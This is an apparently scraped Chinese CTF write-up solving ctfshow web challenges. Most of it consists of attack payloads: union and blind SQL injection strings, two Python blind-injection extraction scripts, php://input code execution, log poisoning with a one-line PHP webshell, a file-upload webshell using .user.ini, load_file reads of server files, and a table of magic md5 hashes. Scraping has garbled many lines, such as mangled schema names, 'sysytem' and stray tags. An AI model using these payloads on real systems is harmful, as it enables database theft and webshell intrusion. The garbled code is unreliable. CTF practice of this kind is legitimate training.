大佬教程收集整理的这篇文章主要介绍了ctfshow-web,大佬教程大佬觉得挺不错的,现在分享给大家,也给大家做个参考。
web签到题
web2
web3
web4
web5
web6
web7
web8
web9
错误做法
正确做法
web10
web11
web12
web13
web14
1' union SELEct 1,GROUP_CONCAt(table_Name),3 from information_scheR_84_11845@a.tables where table_scheR_84_11845@a=database()#
@H_673_1@爆字段名
1' union SELEct 1,GROUP_CONCAt(column_Name),3 from information_scheR_84_11845@a.columns where table_scheR_84_11845@a=database() and table_name=`flag`#
@H_673_1@查数据
1' union SELEct 1,flag,3 from flag#
?url=php://input
POST:<?php sysytem("ls");>
@H_673_1@得到了一个flag文件
?url=php://input
POST:<?php sysytem("cat 文件");>
?url=/var/log/nginx/access.log
@H_673_1@然后我们把一句话木马加在User-Agent里
@H_673_1@在用蚁剑连一下
<?php
$flag="";
$v1=$_GET['v1'];
$v2=$_GET['v2'];
if(isset($v1) && isset($v2)){
if(!ctype_alpha($v1)){
die("v1 error");
}
if(!is_numeric($v2)){
die("v2 error");
}
if(md5($v1)==md5($v2)){
echo $flag;
}
}else{
echo "where is flag?";
}
?>
ctype_alpha():判断变量是否由字母组成
is_numeric():判断变量是否由数字组成
@H_673_1@很简单的c;我们可以直接找一个纯数字和一个纯字母加密后为0e开头的md5值
?v2=240610708&v1=EEIZDOI
@H_673_1@以下为收集到md5值为0e开头的英文和数字
QLTHNDT
0e405967825401955372549139051580
QNKCDZO
0e830400451993494058024219903391
EEIZDOI
0e782601363539291779881938479162
TUFEPMC
0e839407194569345277863905212547
UTIPEZQ
0e382098788231234954670291303879
UYXFLOI
0e552539585246568817348686838809
IHKFRNS
0e256160682445802696926137988570
PJNPDWY
0e291529052894702774557631701704
ABJIHVY
0e755264355178451322893275696586
DQWRASX
0e742373665639232907775599582643
DYAXWCA
0e424759758842488633464374063001
GEGHBXL
0e248776895502908863709684713578
GGHMVOE
0e362766013028313274586933780773
GZECLQZ
0e537612333747236407713628225676
NWWKITQ
0e763082070976038347657360817689
NOOPCJF
0e818888003657176127862245791911
MAUXXQC
0e478478466848439040434801845361
MMHUWUV
0e701732711630150438129209816536
240610708
0e462097431906509019562988736854
314282422
0e990995504821699494520356953734
571579406
0e972379832854295224118025748221
903251147
0e174510503823932942361353209384
1110242161
0e435874558488625891324861198103
1320830526
0e912095958985483346995414060832
1586264293
0e622743671155995737639662718498
2302756269
0e250566888497473798724426794462
2427435592
0e067696952328669732475498472343
2653531602
0e877487522341544758028810610885
3293867441
0e471001201303602543921144570260
3295421201
0e703870333002232681239618856220
3465814713
0e258631645650999664521705537122
3524854780
0e507419062489887827087815735195
3908336290
0e807624498959190415881248245271
4011627063
0e485805687034439905938362701775
4775635065
0e998212089946640967599450361168
4790555361
0e643442214660994430134492464512
5432453531
0e512318699085881630861890526097
5579679820
0e877622011730221803461740184915
5585393579
0e664357355382305805992765337023
6376552501
0e165886706997482187870215578015
7124129977
0e500007361044747804682122060876
7197546197
0e915188576072469101457315675502
7656486157
0e451569119711843337267091732412
admin' or 1=1# //报错了
admin‘/**/or/**/1=1# //成功了
/开始~~
admin'/**/or/**/1=1/**/order/**/by/**/3#
admin'/**/or/**/1=1/**/uninon/**/SELEct/**/1,2,3#
admin'/**/or/**/1=1/**/uninon/**/SELEct/**/1,2,3#
admin'/**/or/**/1=1/**/union/**/SELEct/**/1,GROUP_CONCAt(table_Name),3/**/from/**/information_scheR_84_11845@a.tables/**/where/**/table_scheR_84_11845@a=database()#
admin'/**/or/**/1=1/**/union/**/SELEct/**/1,GROUP_CONCAt(column_Name),3/**/from/**/information_scheR_84_11845@a.columns/**/where/**/table_scheR_84_11845@a="flag"#
admin'/**/or/**/1=1/**/union/**/SELEct/**/1,flag,3/**/from/**/flag#
import requests
url = "http://ef1aa69c-3250-414b-9468-0c03efbfbd6f.chall.ctf.show/?id='/**/"
result = ''
i = 0
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
# payload = 'if(ascii(substr(database(),%d,1))>%d,1,0)' % (i, mid)
# payload = f'if(ascii(substr((SELEct/**/GROUP_CONCAt(table_Name)from(information_scheR_84_11845@a.tables)where(table_scheR_84_11845@a=database())),{i},1))>{miD},1,0)'
# payload = f'if(ascii(substr((SELEct/**/GROUP_CONCAt(column_Name)from(information_scheR_84_11845@a.columns)where(table_name="flag")),{i},1))>{miD},1,0)'
payload = f'if(ascii(substr((SELEct/**/(flag)from(flag)),{i},1))>{miD},1,0)'
r = requests.get(url + payload)
if "by Rudyard Kipling" in r.text:
head = mid + 1
else:
tail = mid
if head != 32:
result += chr(head)
else:
break
print(result)
import requests
url = "http://a448d26a-b594-47a1-b3e0-fddbe1d869ba.chall.ctf.show/?id=-1/**/or/**/"
result = ''
i = 0
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
# payload = f'ascii(substr(database()/**/from/**/{i}/**/for/**/1))>{miD}#'
# payload = f'ascii(substr((SELEct/**/GROUP_CONCAt(table_Name)from(information_scheR_84_11845@a.tables)where(table_scheR_84_11845@a=database()))/**/from/**/{i}/**/for/**/1))>{miD}'
# payload = f'ascii(substr((SELEct/**/GROUP_CONCAt(column_Name)from(information_scheR_84_11845@a.columns)where(table_name="flag"))/**/from/**/{i}/**/for/**/1))>{miD}'
payload = f'ascii(substr((SELEct/**/(flag)from(flag))/**/from/**/{i}/**/for/**/1))>{miD}'
r = requests.get(url + payload)
if "by Rudyard Kipling" in r.text:
head = mid + 1
else:
tail = mid
if head != 32:
result += chr(head)
else:
break
print(result)
<?php
$flag="";
$password=$_POST['password'];
if(strlen($password)>10){
die("password error");
}
$sql="select * from user where username ='admin' and password ='".md5($password,truE)."'";
$result=mysqli_query($con,$sql);
if(mysqli_num_rows($result)>0){
while($row=mysqli_fetch_assoc($result)){
echo "登陆成功<br>";
echo $flag;
}
}
?>
@H_673_1@主要就是这一句话
$sql="select * from user where username ='admin' and password ='".md5($password,truE)."'"
@H_673_1@将密码转换成16进制的hex值以后c;再将其转换成字符串后包含’ ‘or ’ 6’
@H_673_1@select * from admin WHERE pass=’ ‘or ’ 6’
@H_673_1@在网上有两个这样的字符串
ffifdyop、129581926211651571912466741651878684928
@H_673_1@又因为长度有限制c;所以输入ffifdyop可获得flag
<?php
$flag="";
@R_242_3816@ replaceSpecialChar($strParam){
$regex = "/(SELEct|from|where|join|sleep|and|s|union|,)/i";
return preg_replace($regex,"",$strParam);
}
if (!$con)
{
die('Could not connect: ' . mysqli_error());
}
if(strlen($userName)!=strlen(replaceSpecialChar($userName))){
die("sql inject error");
}
if(strlen($password)!=strlen(replaceSpecialChar($password))){
die("sql inject error");
}
$sql="select * from user where username = '$username'";
$result=mysqli_query($con,$sql);
if(mysqli_num_rows($result)>0){
while($row=mysqli_fetch_assoc($result)){
if($password==$row['password']){
echo "登陆成功<br>";
echo $flag;
}
}
}
?>
@H_673_1@源码:对post的数据进行的过滤c;然后要对查询出来的值要和我们post的password相等 @H_673_1@进行了WITH ROLLUP绕过
@H_673_1@WITH ROLLUP是对group by的结果进行进一步的汇总然后显示c;在group by 列名 with rollup 中c;倘若按列名分组后c;列的属性值是不相同的c;会生成一条分组条件的列为null的一条新的数据。而如果查询结果是唯一的c;一会生成一条分组条件所在列为null的数据
'or/**/1=1/**/GROUP/**/BY/**/password/**/WITH/**/ROLLUP/**/LIMIT/**/1/**/OFFSET/**/1#
@H_673_1@因为加入with rollup后 password有一行为NULLc;我们只要输入空密码使得(NULL==NULL)即可
<?php
@R_242_3816@ replaceSpecialChar($strParam){
$regex = "/(SELEct|from|where|join|sleep|and|s|union|,)/i";
return preg_replace($regex,"",$strParam);
}
if(strlen($password)!=strlen(replaceSpecialChar($password))){
die("sql inject error");
}
if($password==$_SESSION['password']){
echo $flag;
}else{
echo "error";
}
?>
@H_673_1@在这里我们可以看到过滤掉了好多东西c;然后它让我们
@H_673_1@输入框的内容等于session的内容
if($password==$_SESSION['password']){
@H_673_1@我们可以删除里面的phpsesionidc;然后session的值为空了c;然后可以直接提交空密码就相等了
php的函数glob();glob()函数返回匹配指定模式的文件名或目录
glob("")匹配任意文件
glob(".txt")匹配以txt后缀的文件
@H_673_1@我们可以用这个方法把当前目录的文件打印一下
@H_673_1@输入:
?cmd=print_r(glob("*"));@H_673_1@ 我们找到了一个文件c;然后用高显函数c;显示一下 @H_673_1@
?cmd=highlight_file('903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php');
@H_673_1@得到flag
@H_673_1@upload.php.bak得到了源码.bak文件是备份文件。 .hg源码泄漏 .git源码泄漏 .DS_Store文件泄漏 .phps .bak结尾的网页
<?php
header("content-type:text/html;charset=utf-8");
$filename = $_FILES['file']['name'];
$tEMP_NAMe = $_FILES['file']['tmp_name'];
$size = $_FILES['file']['size'];
$error = $_FILES['file']['error'];
$arr = pathinfo($fileName);
$ext_suffix = $arr['extension'];
if ($size > 24){
die("error file zise");
}
if (strlen($fileName)>9){
die("error file name");
}
if(strlen($ext_suffiX)>3){
die("error suffix");
}
if(preg_match("/php/i",$ext_suffiX)){
die("error suffix");
}
if(preg_match("/php/i"),$fileName)){
die("error file name");
}
if (move_uploaded_file($tEMP_NAMe, './'.$fileName)){
echo "文件上传成功!";
}else{
echo "文件上传失败!";
}
?>
@H_673_1@我们上传一句话木马c;文件大小要小于24字节c;名字长度要小于9c;后缀小于等于3c;名字中不能有php
@H_673_1@然后我们构造一个一句话木马1.txtc;内容如下
<?php eval($_GET['a']);
@H_673_1@上传成功~然后我们在上传一个.user.inic;在文件中写上
auto_prepend_file=1.txt
@H_673_1@作用就是让txt文件以php呈现
@H_673_1@在这里我尝试用蚁剑连c;发现连不上c;我们就直接在页面上搜索
a=print_r(glob("*"));
@H_673_1@
@H_673_1@
@H_673_1@
@H_673_1@得到了文件c;然后再次使用高显函数进行查看文件
a=highlight_file('903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php');
@H_673_1@得到flag
<?php
include("secret.php");
if(isset($_GET['c'])){
$c = intval($_GET['c']);
sleep($c);
switch ($C) {
case 1:
echo '$url';
break;
case 2:
echo '@A@';
break;
case 555555:
echo $url;
case 44444:
echo "@A@";
break;
case 3333:
echo $url;
break;
case 222:
echo '@A@';
break;
case 222:
echo '@A@';
break;
case 3333:
echo $url;
break;
case 44444:
echo '@A@';
case 555555:
echo $url;
break;
case 3:
echo '@A@';
case 6000000:
echo "$url";
case 1:
echo '@A@';
break;
}
}
highlight_file(__FILE__);
@H_673_1@很明显我们传入参数?c=3c;不会退出循环c;进而执行下一个case语句得到url
here_1s_your_f1ag.php
@H_673_1@我们进入之后发现是一个注入的题目c;然后我们看一下源码
if(preg_match('/information_scheR_84_11845@a.tables|information_scheR_84_11845@a.columns|lineString| |polygon/is', $_GET['query'])){
die('@A@');}
@H_673_1@还是一样的爆一下数据库
?query=-1/**/union/**/SELEct/**/database()
@H_673_1@然后再爆表(注:因为过滤掉了有些关键词c;我们可以利用反引号进行绕过)
table——》`table`
query=-1/**/union/**/SELEct/**/GROUP_CONCAt(table_Name)/**/from/**/information_scheR_84_11845@a.`tables`/**/where/**/table_scheR_84_11845@a=database()
@H_673_1@爆字段名
query=-1/**/union/**/SELEct/**/GROUP_CONCAt(column_Name)/**/from/**/information_scheR_84_11845@a.`columns`/**/where/**/table_name='content'
@H_673_1@爆值
query=-1/**/union/**/SELEct/**/GROUP_CONCAt(id,username,password)/**/from/**/content
@H_673_1@没有得到flagc;但是给了提示在secret.php
@H_673_1@mysql提供读取本地文件的函数load_file()
?query=-1/**/union/**/SELEct/**/load_file('/var/www/html/serect.php')
@H_673_1@源码如下
<?php
$url = 'here_1s_your_f1ag.php';
$file = '/tmp/gtf1y';
if(trim(@file_get_contents($filE)) === 'ctf.show'){
echo file_get_contents('/real_flag_is_here');
}')
@H_673_1@我们可以直接读取'/real_flag_is_here'
?query=-1/**/union/**/SELEct/**/load_file('/real_flag_is_here')
@H_673_1@得到flag
@H_673_1@
@H_673_1@
@H_673_1@
以上是大佬教程为你收集整理的ctfshow-web全部内容,希望文章能够帮你解决ctfshow-web所遇到的程序开发问题。
如果觉得大佬教程网站内容还不错,欢迎将大佬教程推荐给程序员好友。
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。